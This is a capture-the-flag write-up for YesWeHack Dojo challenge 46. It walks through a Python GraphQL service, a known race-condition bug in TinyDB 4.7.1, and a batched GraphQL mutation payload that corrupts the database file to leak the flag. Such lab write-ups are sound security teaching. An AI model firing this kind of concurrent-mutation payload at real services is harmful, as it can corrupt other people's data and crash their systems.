dojo

📜 Challenge Description

Description

A new API has been developed in Python. The developers have placed great emphasis on the API’s speed and load balancing, but at what cost?

⚠️ Note: To view the setup code for this challenge, click on settings (⚙ icon) located at the top over the tab: INFO.

Challenge link : https://dojo-yeswehack.com/challenge-of-the-month/dojo-46

🕵️ Proof of Concept

I. Source Code Analysis

Here is the Python source code provided by the challenge:

import os, json, tinydb, graphene, threading
from urllib.parse import unquote
from jinja2 import Environment, FileSystemLoader
template = Environment(
    autoescape=True,
    loader=FileSystemLoader('/tmp/templates'),
).get_template('index.html')
os.chdir('/tmp')
threads = []
db = tinydb.TinyDB('data.json')

# Define a proper Post type so Graphene knows the structure
class Post(graphene.ObjectType):
    id = graphene.Int()
    content = graphene.String()

class GraphqlQuery(graphene.ObjectType):
    
    get_posts = graphene.List(Post)
    update_post = graphene.Boolean(id=graphene.Int(), content=graphene.String())

    def update_post_in_db(id, content):
        node = db.search(tinydb.Query().id == int(id))
        if node == []:
            return False
        else:
            node[0]['content'] = content
            db.update(node[0], tinydb.Query().id == int(id))
            return True

    def resolve_update_post(self, info, id, content):
        t = threading.Thread(target=GraphqlQuery.update_post_in_db, args=[id, content])
        t.start()
        threads.append(t)

    def resolve_get_posts(self, info):
        return db.all()

def main():
    # User input (GraphQL query)
    query = unquote("userinput")

    schema = graphene.Schema(query=GraphqlQuery)
    schema.execute(query)

    # Wait for all GraphQL processes to finish
    for t in threads:
        t.join()
    
    result = schema.execute("{ getPosts { id content } }")

    # Check if the JSON in the posts are malformed
    posts = {}
    
    # TODO : Random crashes appear time to time with same input, but different error. We working on a fix.
    if result.errors:
        posts = json.dumps({"FLAG": os.environ["FLAG"]}, indent=2)
    else:
        posts = json.dumps(result.data, indent=2)

    print(template.render(posts=posts))

main()

General Analysis

This code loads a database in JSON format (a file) and implements a GraphQL API that manipulates the data contained in this file. The user input is located in the query variable, which is then directly executed as a GraphQL query without any filtering.

The GraphQL API allows manipulation of “posts,” which are defined by an id (an int) and content (a string). The API allows retrieving the content and updating it.

Code analysis and analysis of our goal

The objective here is clear: we need to trigger an error in the result of the GraphQL query to activate the part of the code below, which will display the flag by reading an environment variable:

    if result.errors:
        posts = json.dumps({"FLAG": os.environ["FLAG"]}, indent=2)

I. Library review

Another important element in the source code of this challenge is the setup code of the challenge, which provides an important detail that should always be checked when performing a code review:

tinydb = import_v("tinydb", "4.7.1")

Indeed, the code imports the “tinydb” library, but it imports a very specific version: version “4.7.1”. When performing a code review, it is always relevant to examine the dependencies/libraries used by the code as well as their versions. This can help identify known vulnerabilities or bugs that could potentially be exploited.

In this type of situation, I first search for information about the library on the internet. These libraries are often open source and, in the best (and most common) cases, they have a GitHub repository:

“1”

One of the first things I do is check the “issues” section to see if there are any bugs in the version we are interested in:

“2”

And bingo, there is indeed a referenced bug. For more details, I invite you to directly check the GitHub issue: https://github.com/msiemens/tinydb/issues/529.

In this issue, the author wrote code that follows the same principles as ours, with the ability to retrieve data from a tinydb “db”. These data are referenced and accessible via ids. The parsing and data retrieval code using the id is strangely similar to ours:

“3”

“4”

Moreover, this issue talks about a bug, and more precisely about a crash that occurs when an “attacker tries to update a node way too fast”. And that is exactly what we need: a crash to trigger an error and obtain our flag 🙂 we are now sure that we are on the right track!

The author explains that to generate the crash, it is enough to query the same node multiple times within a few seconds for the code to crash due to the insertion of a null byte in the database file:

“5”

Right after that, he writes a Python script that fuzzes the same node and shows that it crashes within a few seconds. However, in our case, it is not possible to fuzz or generate traffic with multiple simultaneous requests due to the challenge environment:

“6”

Continuing our reading, we notice an important piece of information (which I will summarize here, but which you can read in detail directly in the issue):

“Well, when two users each send an HTTP request to the Flask server, the server handles them asynchronously, meaning this opens up multithreading. One thread (or request) tries to perform a write to the db while the second thread has just started and is behind the first thread by 0.02 seconds, for example. Then this race condition somehow corrupts the last byte of the db.”

In summary, tinydb does not support multithreaded writes, whereas a Flask server (used here by the author) opens multiple threads when two users send the same HTTP request. The problem in our case is that the backend does not seem to explicitly use a Flask server.

II. Exploiting GraphQL queries

However, we can notice a crucial feature in the code above:

    def resolve_update_post(self, info, id, content):
        t = threading.Thread(target=GraphqlQuery.update_post_in_db, args=[id, content])
        t.start()
        threads.append(t)

This feature is used when updating a post. It does not directly update the post but instead launches a thread that executes update_post_in_db, which then updates the database.

Our deduction can be the following: if we manage to send multiple “post” updates at the same time, the application will open several threads simultaneously, which should trigger a crash since the code uses a library version that contains the bug :)

According to the documentation of the graphene library in Python and the GraphQL syntax, to modify a post we can use the following query:

{
  updatePost(id: 1, content: "b4n3")
}

Result: the post is correctly updated:

“7”

Now, is it possible to send multiple updates at once with GraphQL in a single query? After doing some research and finding the correct syntax, the answer is yes:

{
  a: updatePost(id: 1, content: "b4n3")
  b: updatePost(id: 1, content: "b4n3")
  c: updatePost(id: 1, content: "b4n3")
  d: updatePost(id: 1, content: "b4n3")
  e: updatePost(id: 1, content: "b4n3")
}

Sometimes it is necessary to send the payload multiple times to successfully trigger a crash, but here is the flag:

“8”

“9”

The Flag:

FLAG{M4ke_It_Cr4sh_Th3y_Sa1d?!}

Conclusion

This challenge is very interesting because it demonstrates the importance and methodology of vulnerability research in dependencies and libraries associated with audited source code. It is always important to check the versions used, as well as all associated bugs and/or vulnerabilities.

YesWeHack - Dojo 47